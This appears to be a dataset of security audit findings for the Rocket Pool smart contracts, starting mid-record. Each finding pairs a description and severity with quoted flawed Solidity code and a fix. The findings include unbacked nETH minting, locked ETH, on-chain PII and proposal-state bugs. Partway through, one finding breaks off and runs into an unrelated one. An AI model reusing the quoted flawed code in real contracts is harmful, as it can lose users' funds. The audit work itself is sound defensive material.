deposited collateralчmediumчThe `nETH` token is paid to node operators when minipool becomes withdrawable. 
`nETH` is supposed to be backed by `ETH` 1:1. However, in most cases, this will not be the case.\\nThe `nETH` minting and deposition of collateral happens in two different stages of a minipool. `nETH` is minted in the minipool state transition from `Staking` to `Withdrawable` when the trusted/oracle nodes find consensus on the fact that the minipool became withdrawable (submitWinipoolWithdrawable).\\n```\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n setMinipoolWithdrawable(\\_minipoolAddress, \\_stakingStartBalance, \\_stakingEndBalance);\\n}\\n```\\n\\nWhen consensus is found on the state of the `minipool`, `nETH` tokens are minted to the `minipool` address according to the withdrawal amount observed by the trusted/oracle nodes. At this stage, `ETH` backing the newly minted `nETH` was not yet provided.\\n```\\nuint256 nodeAmount = getMinipoolNodeRewardAmount(\\n minipool.getNodeFee(),\\n userDepositBalance,\\n minipool.getStakingStartBalance(),\\n minipool.getStakingEndBalance()\\n);\\n// Mint nETH to minipool contract\\nif (nodeAmount > 0) { rocketTokenNETH.mint(nodeAmount, \\_minipoolAddress); }\\n```\\n\\nThe `nETH` token contract now holds more `nETH.totalsupply` than actual `ETH` collateral. It is out of sync with the `ETH` reserve and therefore becomes undercollateralized. This should generally be avoided as the security guarantees that for every `nETH` someone deposited, `ETH` does not hold. However, the newly minted `nETH` is locked to the `minipoolAddress`, and the minipool has no means of redeeming the `nETH` for `ETH` directly (via nETH.burn()).\\nThe transition from Withdrawable to `Destroyed` the actual collateral for the previously minted `nETH` (still locked to minipoolAddress) is provided by the `Eth2` withdrawal contract. There is no specification for the withdrawal contract as of now. 
Still, it is assumed that some entity triggers the payout for the `Eth2` rewards on the withdrawal contract, which sends the amount of `ETH` to the configured withdrawal address (the minipoolAddress).\\nThe `minipool.receive()` function receives the `ETH`\\n```\\nreceive() external payable {\\n (bool success, bytes memory data) = getContractAddress(\"rocketMinipoolDelegate\").delegatecall(abi.encodeWithSignature(\"receiveValidatorBalance()\"));\\n if (!success) { revert(getRevertMessage(data)); }\\n}\\n```\\n\\nand forwards it to `minipooldelegate.receiveValidatorBalance`\\n```\\nrequire(msg.sender == rocketDAOProtocolSettingsNetworkInterface.getSystemWithdrawalContractAddress(), \"The minipool's validator balance can only be sent by the eth1 system withdrawal contract\");\\n// Set validator balance withdrawn status\\nvalidatorBalanceWithdrawn = true;\\n// Process validator withdrawal for minipool\\nrocketNetworkWithdrawal.processWithdrawal{value: msg.value}();\\n```\\n\\nWhich calculates the `nodeAmount` based on the `ETH` received and submits it as collateral to back the previously minted `nodeAmount` of `nETH`.\\n```\\nuint256 totalShare = rocketMinipoolManager.getMinipoolWithdrawalTotalBalance(msg.sender);\\nuint256 nodeShare = rocketMinipoolManager.getMinipoolWithdrawalNodeBalance(msg.sender);\\nuint256 userShare = totalShare.sub(nodeShare);\\n// Get withdrawal amounts based on shares\\nuint256 nodeAmount = 0;\\nuint256 userAmount = 0;\\nif (totalShare > 0) {\\n nodeAmount = msg.value.mul(nodeShare).div(totalShare);\\n userAmount = msg.value.mul(userShare).div(totalShare);\\n}\\n// Set withdrawal processed status\\nrocketMinipoolManager.setMinipoolWithdrawalProcessed(msg.sender);\\n// Transfer node balance to nETH contract\\nif (nodeAmount > 0) { rocketTokenNETH.depositRewards{value: nodeAmount}(); }\\n// Transfer user balance to rETH contract or deposit pool\\n```\\n\\nLooking at how the `nodeAmount` of `nETH` that was minted was calculated and comparing it 
to how `nodeAmount` of `ETH` is calculated, we can observe the following:\\nthe `nodeAmount` of `nETH` minted is an absolute number of tokens based on the rewards observed by the trusted/oracle nodes. the `nodeAmount` is stored in the storage and later used to calculate the collateral deposit in a later step.\\nthe `nodeAmount` calculated when depositing the collateral is first assumed to be a `nodeShare` (line 47), while it is actually an absolute number. the `nodeShare` is then turned into a `nodeAmount` relative to the `ETH` supplied to the contract.\\nDue to rounding errors, this might not always exactly match the `nETH` minted (see https://github.com/ConsenSys/rocketpool-audit-2021-03/issues/26).\\nThe collateral calculation is based on the `ETH` value provided to the contract. If this value does not exactly match what was reported by the oracle/trusted nodes when minting `nETH`, less/more collateral will be provided.\\nNote: excess collateral will be locked in the `nETH` contract as it is unaccounted for in the `nETH` token contract and therefore cannot be redeemed.\\nNote: providing less collateral will go unnoticed and mess up the 1:1 `nETH:ETH` peg. In the worst case, there will be less `nETH` than `ETH`. Not everybody will be able to redeem their `ETH`.\\nNote: keep in mind that the `receive()` function might be subject to gas restrictions depending on the implementation of the withdrawal contract (.call() vs. .transfer())\\nThe `nETH` minted is initially uncollateralized and locked to the `minipoolAddress`, which cannot directly redeem it for `ETH`. The next step (next stage) is collateralized with the staking rewards (which, as noted, might not always completely add up to the minted nETH). 
At the last step in `withdraw()`, the `nETH` is transferred to the `withdrawalAddress` of the minipool.\\n```\\nuint256 nethBalance = rocketTokenNETH.balanceOf(address(this));\\nif (nethBalance > 0) {\\n // Get node withdrawal address\\n RocketNodeManagerInterface rocketNodeManager = RocketNodeManagerInterface(getContractAddress(\"rocketNodeManager\"));\\n address nodeWithdrawalAddress = rocketNodeManager.getNodeWithdrawalAddress(nodeAddress);\\n // Transfer\\n require(rocketTokenNETH.transfer(nodeWithdrawalAddress, nethBalance), \"nETH balance was not successfully transferred to node operator\");\\n // Emit nETH withdrawn event\\n emit NethWithdrawn(nodeWithdrawalAddress, nethBalance, block.timestamp);\\n}\\n```\\n\\nSince the `nETH` initially minted can never take part in the `nETH` token market (as it is locked to the minipool address, which can only transfer it to the withdrawal address in the last step), the question arises why it is actually minted early in the lifecycle of the minipool. At the same time, it could as well be just directly minted to `withdrawalAddress` when providing the right amount of collateral in the last step of the minipool lifecycle. 
Furthermore, if `nETH` is minted at this stage, it should be questioned why `nETH` is actually needed when you can directly forward the `nodeAmount` to the `withdrawalAddress` instead of minting an intermediary token that is pegged 1:1 to `ETH`.\\nFor reference, `depositRewards` (providing collateral) and `mint` are not connected at all, hence the risk of `nETH` being an undercollateralized token.\\n```\\nfunction depositRewards() override external payable onlyLatestContract(\"rocketNetworkWithdrawal\", msg.sender) {\\n // Emit ether deposited event\\n emit EtherDeposited(msg.sender, msg.value, block.timestamp);\\n}\\n\\n// Mint nETH\\n// Only accepts calls from the RocketMinipoolStatus contract\\nfunction mint(uint256 \\_amount, address \\_to) override external onlyLatestContract(\"rocketMinipoolStatus\", msg.sender) {\\n // Check amount\\n require(\\_amount > 0, \"Invalid token mint amount\");\\n // Update balance & supply\\n \\_mint(\\_to, \\_amount);\\n // Emit tokens minted event\\n emit TokensMinted(\\_to, \\_amount, block.timestamp);\\n}\\n```\\nчIt looks like `nETH` might not be needed at all, and it should be discussed if the added complexity of having a potentially out-of-sync `nETH` token contract is necessary and otherwise remove it from the contract system as the `nodeAmount` of `ETH` can directly be paid out to the `withdrawalAddress` in the `receiveValidatorBalance` or `withdraw` transitions.\\nIf `nETH` cannot be removed, consider minting `nodeAmount` of `nETH` directly to `withdrawalAddress` on `withdraw` instead of first minting uncollateralized tokens. This will also reduce the gas footprint of the Minipool.\\nEnsure that the initial `nodeAmount` calculation matches the minted `nETH` and deposited to the contract as collateral (absolute amount vs. 
fraction).\\nEnforce that `nETH` requires collateral to be provided when minting tokens.чч```\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n setMinipoolWithdrawable(\\_minipoolAddress, \\_stakingStartBalance, \\_stakingEndBalance);\\n}\\n```\\n -RocketMiniPoolDelegate - on destroy() leftover ETH is sent to RocketVault where it cannot be recoveredчmediumчWhen destroying the `MiniPool`, leftover `ETH` is sent to the `RocketVault`. Since `RocketVault` has no means to recover “unaccounted” `ETH` (not deposited via depositEther), funds forcefully sent to the vault will end up being locked.\\n```\\n// Destroy the minipool\\nfunction destroy() private {\\n // Destroy minipool\\n RocketMinipoolManagerInterface rocketMinipoolManager = RocketMinipoolManagerInterface(getContractAddress(\"rocketMinipoolManager\"));\\n rocketMinipoolManager.destroyMinipool();\\n // Self destruct & send any remaining ETH to vault\\n selfdestruct(payable(getContractAddress(\"rocketVault\")));\\n}\\n```\\nчImplement means to recover and reuse `ETH` that was forcefully sent to the contract by `MiniPool` instances.чч```\\n// Destroy the minipool\\nfunction destroy() private {\\n // Destroy minipool\\n RocketMinipoolManagerInterface rocketMinipoolManager = RocketMinipoolManagerInterface(getContractAddress(\"rocketMinipoolManager\"));\\n rocketMinipoolManager.destroyMinipool();\\n // Self destruct & send any remaining ETH to vault\\n selfdestruct(payable(getContractAddress(\"rocketVault\")));\\n}\\n```\\n -RocketDAO - personally identifiable member information (PII) stored on-chain AcknowledgedчmediumчLike a DAO user's e-mail address, PII is stored on-chain and can, therefore, be accessed by anyone. 
This may allow de-pseudonymizing users (correlating Ethereum addresses with user email addresses) and be used for spamming
In contrast, `RocketBase.getContractAddress()` fails if the requested contract is not known.\\nIt should be noted that this can happen if `rocketMinipoolDelegate` is not set in global storage, or it was cleared afterward, or if `_rocketStorageAddress` points to a contract that implements a non-throwing fallback function (may not even be storage at all).\\nMissing checks\\n```\\nfunction getContractAddress(string memory \\_contractName) private view returns (address) {\\n return rocketStorage.getAddress(keccak256(abi.encodePacked(\"contract.address\", \\_contractName)));\\n}\\n```\\n\\n```\\nfunction getContractAddress(string memory \\_contractName) private view returns (address) {\\n return rocketStorage.getAddress(keccak256(abi.encodePacked(\"contract.address\", \\_contractName)));\\n}\\n```\\n\\nChecks implemented\\n```\\nfunction getContractAddress(string memory \\_contractName) internal view returns (address) {\\n // Get the current contract address\\n address contractAddress = getAddress(keccak256(abi.encodePacked(\"contract.address\", \\_contractName)));\\n // Check it\\n require(contractAddress != address(0x0), \"Contract not found\");\\n // Return\\n return contractAddress;\\n}\\n```\\nчResolution\\nAddressed in branch `rp3.0-updates` (rocket-pool/[email protected]b424ca1) by changing requiring that the contract address is not `0x0`.\\nSimilar to `RocketBase.getContractAddress()` require that the contract is set.чч```\\nfunction getContractAddress(string memory \\_contractName) private view returns (address) {\\n return rocketStorage.getAddress(keccak256(abi.encodePacked(\"contract.address\", \\_contractName)));\\n}\\n```\\n -RocketDAONodeTrustedAction - ambiguous event emitted in actionChallengeDecideчlowч`actionChallengeDecide` succeeds and emits `challengeSuccess=False` in case the challenged node defeats the challenge. It also emits the same event if another node calls `actionChallengeDecided` before the refute window passed. 
This ambiguity may make a defeated challenge indistinguishable from a challenge that was attempted to be decided too early (unless the component listening for the event also checks the refute window).\\n```\\n // Allow the challenged member to refute the challenge at anytime. If the window has passed and the challenge node does not run this method, any member can decide the challenge and eject the absent member\\n // Is it the node being challenged?\\n if(\\_nodeAddress == msg.sender) {\\n // Challenge is defeated, node has responded\\n deleteUint(keccak256(abi.encodePacked(daoNameSpace, \"member.challenged.block\", \\_nodeAddress)));\\n }else{\\n // The challenge refute window has passed, the member can be ejected now\\n if(getUint(keccak256(abi.encodePacked(daoNameSpace, \"member.challenged.block\", \\_nodeAddress))).add(rocketDAONodeTrustedSettingsMembers.getChallengeWindow()) < block.number) {\\n // Node has been challenged and failed to respond in the given window, remove them as a member and their bond is burned\\n \\_memberRemove(\\_nodeAddress);\\n // Challenge was successful\\n challengeSuccess = true;\\n }\\n }\\n // Log it\\n emit ActionChallengeDecided(\\_nodeAddress, msg.sender, challengeSuccess, block.timestamp);\\n}\\n```\\nчAvoid ambiguities when emitting events. Consider throwing an exception in the else branch if the refute window has not passed yet (minimal gas savings; it's clear that the call failed; other components can rely on the event only being emitted if there was a decision.чч```\\n // Allow the challenged member to refute the challenge at anytime. 
If the window has passed and the challenge node does not run this method, any member can decide the challenge and eject the absent member\\n // Is it the node being challenged?\\n if(\\_nodeAddress == msg.sender) {\\n // Challenge is defeated, node has responded\\n deleteUint(keccak256(abi.encodePacked(daoNameSpace, \"member.challenged.block\", \\_nodeAddress)));\\n }else{\\n // The challenge refute window has passed, the member can be ejected now\\n if(getUint(keccak256(abi.encodePacked(daoNameSpace, \"member.challenged.block\", \\_nodeAddress))).add(rocketDAONodeTrustedSettingsMembers.getChallengeWindow()) < block.number) {\\n // Node has been challenged and failed to respond in the given window, remove them as a member and their bond is burned\\n \\_memberRemove(\\_nodeAddress);\\n // Challenge was successful\\n challengeSuccess = true;\\n }\\n }\\n // Log it\\n emit ActionChallengeDecided(\\_nodeAddress, msg.sender, challengeSuccess, block.timestamp);\\n}\\n```\\n -RocketDAOProtocolProposals, RocketDAONodeTrustedProposals - unused enum ProposalTypeчlowчThe enum `ProposalType` is defined but never used.\\n```\\nenum ProposalType {\\n Invite, // Invite a registered node to join the trusted node DAO\\n Leave, // Leave the DAO\\n Replace, // Replace a current trusted node with a new registered node, they take over their bond\\n Kick, // Kick a member from the DAO with optional penalty applied to their RPL deposit\\n Setting // Change a DAO setting (Quorum threshold, RPL deposit size, voting periods etc)\\n}\\n```\\n\\n```\\nenum ProposalType {\\n Setting // Change a DAO setting (Node operator min/max fees, inflation rate etc)\\n}\\n```\\nчRemove unnecessary code.чч```\\nenum ProposalType {\\n Invite, // Invite a registered node to join the trusted node DAO\\n Leave, // Leave the DAO\\n Replace, // Replace a current trusted node with a new registered node, they take over their bond\\n Kick, // Kick a member from the DAO with optional penalty applied to their RPL 
deposit\\n Setting // Change a DAO setting (Quorum threshold, RPL deposit size, voting periods etc)\\n}\\n```\\n -RocketDaoNodeTrusted - Unused eventsчlowчThe `MemberJoined` `MemberLeave` events are not used within `RocketDaoNodeTrusted`.\\n```\\n// Events\\nevent MemberJoined(address indexed \\_nodeAddress, uint256 \\_rplBondAmount, uint256 time); \\nevent MemberLeave(address indexed \\_nodeAddress, uint256 \\_rplBondAmount, uint256 time);\\n```\\nчConsider removing the events. Note: `RocketDAONodeTrustedAction` is emitting `ActionJoin` and `ActionLeave` event.sчч```\\n// Events\\nevent MemberJoined(address indexed \\_nodeAddress, uint256 \\_rplBondAmount, uint256 time); \\nevent MemberLeave(address indexed \\_nodeAddress, uint256 \\_rplBondAmount, uint256 time);\\n```\\n -RocketDAOProposal - expired, and defeated proposals can be canceledчlowчThe `RocketDAOProposal.getState` function defaults a proposal's state to `ProposalState.Defeated`. While this fallback can be considered secure, the remaining code does not perform checks that prevent defeated proposals from changing their state. As such, a user can transition a proposal that is `Expired` or `Defeated` to `Cancelled` by using the `RocketDAOProposal.cancel` function. 
This can be used to deceive users and potentially bias future votes.\\nThe method emits an event that might trigger other components to perform actions.\\n```\\n} else {\\n // Check the votes, was it defeated?\\n // if (votesFor <= votesAgainst || votesFor < getVotesRequired(\\_proposalID))\\n return ProposalState.Defeated;\\n}\\n```\\n\\n```\\nfunction cancel(address \\_member, uint256 \\_proposalID) override public onlyDAOContract(getDAO(\\_proposalID)) {\\n // Firstly make sure this proposal that hasn't already been executed\\n require(getState(\\_proposalID) != ProposalState.Executed, \"Proposal has already been executed\");\\n // Make sure this proposal hasn't already been successful\\n require(getState(\\_proposalID) != ProposalState.Succeeded, \"Proposal has already succeeded\");\\n // Only allow the proposer to cancel\\n require(getProposer(\\_proposalID) == \\_member, \"Proposal can only be cancelled by the proposer\");\\n // Set as cancelled now\\n setBool(keccak256(abi.encodePacked(daoProposalNameSpace, \"cancelled\", \\_proposalID)), true);\\n // Log it\\n emit ProposalCancelled(\\_proposalID, \\_member, block.timestamp);\\n}\\n```\\nчPreserve the true outcome. Do not allow to cancel proposals that are already in an end-state like `canceled`, `expired`, `defeated`.чч```\\n} else {\\n // Check the votes, was it defeated?\\n // if (votesFor <= votesAgainst || votesFor < getVotesRequired(\\_proposalID))\\n return ProposalState.Defeated;\\n}\\n```\\n -RocketDAOProposal - preserve the proposals correct state after expirationчlowчThe state of proposals is resolved to give a preference to a proposal being `expired` over the actual result which may be `defeated`. The preference for a proposal's status is checked in order: `cancelled? -> executed? -> `expired`? -> succeeded? -> pending? -> active? 
-> `defeated` (default)`\\n```\\nif (getCancelled(\\_proposalID)) {\\n // Cancelled by the proposer?\\n return ProposalState.Cancelled;\\n // Has it been executed?\\n} else if (getExecuted(\\_proposalID)) {\\n return ProposalState.Executed;\\n // Has it expired?\\n} else if (block.number >= getExpires(\\_proposalID)) {\\n return ProposalState.Expired;\\n // Vote was successful, is now awaiting execution\\n} else if (votesFor >= getVotesRequired(\\_proposalID)) {\\n return ProposalState.Succeeded;\\n // Is the proposal pending? Eg. waiting to be voted on\\n} else if (block.number <= getStart(\\_proposalID)) {\\n return ProposalState.Pending;\\n // The proposal is active and can be voted on\\n} else if (block.number <= getEnd(\\_proposalID)) {\\n return ProposalState.Active;\\n} else {\\n // Check the votes, was it defeated?\\n // if (votesFor <= votesAgainst || votesFor < getVotesRequired(\\_proposalID))\\n return ProposalState.Defeated;\\n}\\n```\\nчconsider checking for `voteAgainst` explicitly and return `defeated` instead of `expired` if a proposal was `defeated` and is queried after expiration. Preserve the actual proposal result.чч```\\nif (getCancelled(\\_proposalID)) {\\n // Cancelled by the proposer?\\n return ProposalState.Cancelled;\\n // Has it been executed?\\n} else if (getExecuted(\\_proposalID)) {\\n return ProposalState.Executed;\\n // Has it expired?\\n} else if (block.number >= getExpires(\\_proposalID)) {\\n return ProposalState.Expired;\\n // Vote was successful, is now awaiting execution\\n} else if (votesFor >= getVotesRequired(\\_proposalID)) {\\n return ProposalState.Succeeded;\\n // Is the proposal pending? Eg. 
waiting to be voted on\\n} else if (block.number <= getStart(\\_proposalID)) {\\n return ProposalState.Pending;\\n // The proposal is active and can be voted on\\n} else if (block.number <= getEnd(\\_proposalID)) {\\n return ProposalState.Active;\\n} else {\\n // Check the votes, was it defeated?\\n // if (votesFor <= votesAgainst || votesFor < getVotesRequired(\\_proposalID))\\n return ProposalState.Defeated;\\n}\\n```\\n -RocketRewardsPool - registerClaimer should check if a node is already disabled before decrementing rewards.pool.claim.interval.claimers.total.nextчlowчThe other branch in `registerClaimer` does not check whether the provided `_claimerAddress` is already disabled (or invalid). This might lead to inconsistencies where `rewards.pool.claim.interval.claimers.total.next` is decremented because the caller provided an already deactivated address.\\nThis issue is flagged as `minor` since we have not found an exploitable version of this issue in the current codebase. However, we recommend safeguarding the implementation instead of relying on the caller to provide sane parameters. 
Registered Nodes cannot unregister, and Trusted Nodes are unregistered when they leave.\\n```\\nfunction registerClaimer(address \\_claimerAddress, bool \\_enabled) override external onlyClaimContract {\\n // The name of the claiming contract\\n string memory contractName = getContractName(msg.sender);\\n // Record the block they are registering at\\n uint256 registeredBlock = 0;\\n // How many users are to be included in next interval\\n uint256 claimersIntervalTotalUpdate = getClaimingContractUserTotalNext(contractName);\\n // Ok register\\n if(\\_enabled) {\\n // Make sure they are not already registered\\n require(getClaimingContractUserRegisteredBlock(contractName, \\_claimerAddress) == 0, \"Claimer is already registered\");\\n // Update block number\\n registeredBlock = block.number;\\n // Update the total registered claimers for next interval\\n setUint(keccak256(abi.encodePacked(\"rewards.pool.claim.interval.claimers.total.next\", contractName)), claimersIntervalTotalUpdate.add(1));\\n }else{\\n setUint(keccak256(abi.encodePacked(\"rewards.pool.claim.interval.claimers.total.next\", contractName)), claimersIntervalTotalUpdate.sub(1));\\n }\\n // Save the registered block\\n setUint(keccak256(abi.encodePacked(\"rewards.pool.claim.contract.registered.block\", contractName, \\_claimerAddress)), registeredBlock);\\n}\\n```\\nчEnsure that `getClaimingContractUserRegisteredBlock(contractName, _claimerAddress)` returns `!=0` before decrementing the `.total.next`.чч```\\nfunction registerClaimer(address \\_claimerAddress, bool \\_enabled) override external onlyClaimContract {\\n // The name of the claiming contract\\n string memory contractName = getContractName(msg.sender);\\n // Record the block they are registering at\\n uint256 registeredBlock = 0;\\n // How many users are to be included in next interval\\n uint256 claimersIntervalTotalUpdate = getClaimingContractUserTotalNext(contractName);\\n // Ok register\\n if(\\_enabled) {\\n // Make sure they are not 
already registered\\n require(getClaimingContractUserRegisteredBlock(contractName, \\_claimerAddress) == 0, \"Claimer is already registered\");\\n // Update block number\\n registeredBlock = block.number;\\n // Update the total registered claimers for next interval\\n setUint(keccak256(abi.encodePacked(\"rewards.pool.claim.interval.claimers.total.next\", contractName)), claimersIntervalTotalUpdate.add(1));\\n }else{\\n setUint(keccak256(abi.encodePacked(\"rewards.pool.claim.interval.claimers.total.next\", contractName)), claimersIntervalTotalUpdate.sub(1));\\n }\\n // Save the registered block\\n setUint(keccak256(abi.encodePacked(\"rewards.pool.claim.contract.registered.block\", contractName, \\_claimerAddress)), registeredBlock);\\n}\\n```\\n -RocketNetworkPrices - Price feed update lacks block number sanity checkчlowчTrusted nodes submit the RPL price feed. The function is called specifying a block number and the corresponding RPL price for that block. If a DAO vote goes through for that block-price combination, it is written to storage. In the unlikely scenario that a vote confirms a very high block number such as `uint(-1)`, all future price updates will fail due to the `require` check below.\\nThis issue becomes less likely the more active members the DAO has. Thus, it's considered a minor issue that mainly affects the initial bootstrapping process.\\n```\\n// Check block\\nrequire(\\_block > getPricesBlock(), \"Network prices for an equal or higher block are set\");\\n```\\nчThe function's `_block` parameter should be checked to prevent large block numbers from being submitted. 
This check could, e.g., specify that node operators are only allowed to submit price updates for a maximum of x blocks ahead of `block.number`.чч```\\n// Check block\\nrequire(\\_block > getPricesBlock(), \"Network prices for an equal or higher block are set\");\\n```\\n -RocketDepositPool - Potential gasDoS in assignDeposits Acknowledgedчlowч`assignDeposits` seems to be a gas heavy function, with many external calls in general, and few of them are inside the for loop itself. By default, `rocketDAOProtocolSettingsDeposit.getMaximumDepositAssignments()` returns `2`, which is not a security concern. Through a DAO vote, the settings key `deposit.assign.maximum` can be set to a value that exhausts the block gas limit and effectively deactivates the deposit assignment process.\\n```\\nfor (uint256 i = 0; i < rocketDAOProtocolSettingsDeposit.getMaximumDepositAssignments(); ++i) {\\n // Get & check next available minipool capacity\\n```\\nчThe `rocketDAOProtocolSettingsDeposit.getMaximumDepositAssignments()` return value could be cached outside the loop. 
Additionally, a check should be added that prevents unreasonably high values.чч```\\nfor (uint256 i = 0; i < rocketDAOProtocolSettingsDeposit.getMaximumDepositAssignments(); ++i) {\\n // Get & check next available minipool capacity\\n```\\n -RocketNetworkWithdrawal - ETH dust lockup due to rounding errorsчlowчThere's a potential `ETH` dust lockup when processing a withdrawal due to rounding errors when performing a division.\\n```\\nuint256 totalShare = rocketMinipoolManager.getMinipoolWithdrawalTotalBalance(msg.sender);\\nuint256 nodeShare = rocketMinipoolManager.getMinipoolWithdrawalNodeBalance(msg.sender);\\nuint256 userShare = totalShare.sub(nodeShare);\\n// Get withdrawal amounts based on shares\\nuint256 nodeAmount = 0;\\nuint256 userAmount = 0;\\nif (totalShare > 0) {\\n nodeAmount = msg.value.mul(nodeShare).div(totalShare);\\n userAmount = msg.value.mul(userShare).div(totalShare);\\n}\\n```\\nчCalculate `userAmount` as `msg.value - nodeAmount` instead. This should also save some gas.чч```\\nuint256 totalShare = rocketMinipoolManager.getMinipoolWithdrawalTotalBalance(msg.sender);\\nuint256 nodeShare = rocketMinipoolManager.getMinipoolWithdrawalNodeBalance(msg.sender);\\nuint256 userShare = totalShare.sub(nodeShare);\\n// Get withdrawal amounts based on shares\\nuint256 nodeAmount = 0;\\nuint256 userAmount = 0;\\nif (totalShare > 0) {\\n nodeAmount = msg.value.mul(nodeShare).div(totalShare);\\n userAmount = msg.value.mul(userShare).div(totalShare);\\n}\\n```\\n -RocketAuctionManager - calcBase should be declared constantчlowчDeclaring the same constant value `calcBase` multiple times as local variables to some methods in `RocketAuctionManager` carries the risk that if that value is ever updated, one of the value assignments might be missed. It is therefore highly recommended to reduce duplicate code and declare the value as a public constant. 
This way, it is clear that the same `calcBase` is used throughout the contract, and there is a single point of change in case it ever needs to be changed.\\n```\\nfunction getLotPriceByTotalBids(uint256 \\_index) override public view returns (uint256) {\\n uint256 calcBase = 1 ether;\\n return calcBase.mul(getLotTotalBidAmount(\\_index)).div(getLotTotalRPLAmount(\\_index));\\n}\\n```\\n\\n```\\nfunction getLotClaimedRPLAmount(uint256 \\_index) override public view returns (uint256) {\\n uint256 calcBase = 1 ether;\\n return calcBase.mul(getLotTotalBidAmount(\\_index)).div(getLotCurrentPrice(\\_index));\\n}\\n```\\n\\n```\\n// Calculation base value\\nuint256 calcBase = 1 ether;\\n```\\n\\n```\\nuint256 bidAmount = msg.value;\\nuint256 calcBase = 1 ether;\\n```\\n\\n```\\n// Calculate RPL claim amount\\nuint256 calcBase = 1 ether;\\nuint256 rplAmount = calcBase.mul(bidAmount).div(currentPrice);\\n```\\nчConsider declaring `calcBase` as a private const state var instead of re-declaring it with the same value in multiple, multiple functions. 
Constant, literal state vars are replaced in a preprocessing step and do not require significant additional gas when accessed than normal state vars.чч```\\nfunction getLotPriceByTotalBids(uint256 \\_index) override public view returns (uint256) {\\n uint256 calcBase = 1 ether;\\n return calcBase.mul(getLotTotalBidAmount(\\_index)).div(getLotTotalRPLAmount(\\_index));\\n}\\n```\\n -RocketDAO* - daoNamespace is missing a trailing dot; should be declared constant/immutableчlowч`string private daoNameSpace = 'dao.trustednodes'` is missing a trailing dot, or else there's no separator when concatenating the namespace with the vars.\\nrequests `dao.trustednodesmember.index` instead of `dao.trustednodes.member.index`\\n```\\nfunction getMemberAt(uint256 \\_index) override public view returns (address) {\\n AddressSetStorageInterface addressSetStorage = AddressSetStorageInterface(getContractAddress(\"addressSetStorage\"));\\n return addressSetStorage.getItem(keccak256(abi.encodePacked(daoNameSpace, \"member.index\")), \\_index);\\n}\\n```\\n\\n```\\n// The namespace for any data stored in the trusted node DAO (do not change)\\nstring private daoNameSpace = 'dao.trustednodes';\\n```\\n\\n```\\n// Calculate using this as the base\\nuint256 private calcBase = 1 ether;\\n\\n// The namespace for any data stored in the trusted node DAO (do not change)\\nstring private daoNameSpace = 'dao.trustednodes';\\n```\\n\\n```\\n// The namespace for any data stored in the network DAO (do not change)\\nstring private daoNameSpace = 'dao.protocol';\\n```\\nчRemove the `daoNameSpace` and add the prefix to the respective variables directly.чч```\\nfunction getMemberAt(uint256 \\_index) override public view returns (address) {\\n AddressSetStorageInterface addressSetStorage = AddressSetStorageInterface(getContractAddress(\"addressSetStorage\"));\\n return addressSetStorage.getItem(keccak256(abi.encodePacked(daoNameSpace, \"member.index\")), \\_index);\\n}\\n```\\n -RocketVault - consider 
rejecting zero amount deposit/withdrawal requestsчlowчConsider disallowing zero amount token transfers unless the system requires this to work. In most cases, zero amount token transfers will emit an event (that potentially triggers off-chain components). In some cases, they allow the caller without holding any balance to call back to themselves (pot. reentrancy) or the caller provided token address.\\n`depositEther` allows to deposit zero ETH\\nemits `EtherDeposited`\\n`withdrawEther` allows to withdraw zero ETH\\ncalls back to `withdrawer` (msg.sender)!\\nemits `EtherWithdrawn`\\n(depositToken checks for amount >0)\\n`withdrawToken` allows zero amount token withdrawals\\ncalls into user provided (actually a network contract) tokenAddress)\\nemits `TokenWithdrawn`\\n`transferToken` allows zero amount token transfers\\nemits `TokenTransfer`\\n```\\nfunction depositEther() override external payable onlyLatestNetworkContract {\\n // Get contract key\\n bytes32 contractKey = keccak256(abi.encodePacked(getContractName(msg.sender)));\\n // Update contract balance\\n etherBalances[contractKey] = etherBalances[contractKey].add(msg.value);\\n // Emit ether deposited event\\n emit EtherDeposited(contractKey, msg.value, block.timestamp);\\n}\\n```\\nчZero amount transfers are no-operation calls in most cases and should be avoided. However, as all vault actions are authenticated (to registered system contracts), the risk of something going wrong is rather low. 
Nevertheless, it is recommended to deny zero amount transfers to avoid running code unnecessarily (gas consumption), emitting unnecessary events, or potentially call back to callers/token address for ineffective transfers.чч```\\nfunction depositEther() override external payable onlyLatestNetworkContract {\\n // Get contract key\\n bytes32 contractKey = keccak256(abi.encodePacked(getContractName(msg.sender)));\\n // Update contract balance\\n etherBalances[contractKey] = etherBalances[contractKey].add(msg.value);\\n // Emit ether deposited event\\n emit EtherDeposited(contractKey, msg.value, block.timestamp);\\n}\\n```\\n -RocketVault - methods returning static return values and unchecked return parametersчlowчThe `Token*` methods in `RocketVault` either throw or return `true`, but they can never return `false`. If the method fails, it will always throw. Therefore, it is questionable if the static return value is needed at all. Furthermore, callees are in most cases not checking the return value of\\nstatic return value `true`\\n```\\n// Emit token transfer\\nemit TokenDeposited(contractKey, \\_tokenAddress, \\_amount, block.timestamp);\\n// Done\\nreturn true;\\n```\\n\\n```\\nemit TokenWithdrawn(contractKey, \\_tokenAddress, \\_amount, block.timestamp);\\n// Done\\nreturn true;\\n```\\n\\n```\\n// Emit token withdrawn event\\nemit TokenTransfer(contractKeyFrom, contractKeyTo, \\_tokenAddress, \\_amount, block.timestamp);\\n// Done\\nreturn true;\\n```\\n\\nreturn value not checked\\n```\\nrocketVault.depositToken(\"rocketNodeStaking\", rplTokenAddress, \\_amount);\\n// Update RPL stake amounts & node RPL staked block\\n```\\n\\n```\\nrocketVault.withdrawToken(msg.sender, getContractAddress(\"rocketTokenRPL\"), rplAmount);\\n```\\n\\n```\\nrocketVault.withdrawToken(msg.sender, getContractAddress(\"rocketTokenRPL\"), \\_amount);\\n```\\n\\n```\\nrocketVault.transferToken(\"rocketAuctionManager\", getContractAddress(\"rocketTokenRPL\"), 
